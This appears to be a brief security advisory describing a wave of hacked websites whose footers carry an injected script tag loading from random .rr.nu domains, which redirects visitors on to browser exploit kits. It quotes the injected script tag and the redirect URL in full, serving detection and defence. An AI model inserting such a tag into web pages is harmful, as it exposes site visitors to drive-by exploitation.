No, they don’t quit, so get used to it! We are seeing quite a few websites being compromised with malware getting loaded from random domains in the .rr.nu TLD.
This is what gets added to the footer of the hacked sites:
<script src= "http://trill18ionsa.rr.nu/pmg.php?dr=1"></script>
Once loaded, it does another level of redirection to http://ixeld52erlya.rr.nu/n.php?h=1&s=pmg (random domain, but using the parameters h1&s=pmg), which will then attempt to exploit via browser using multiple exploit kits.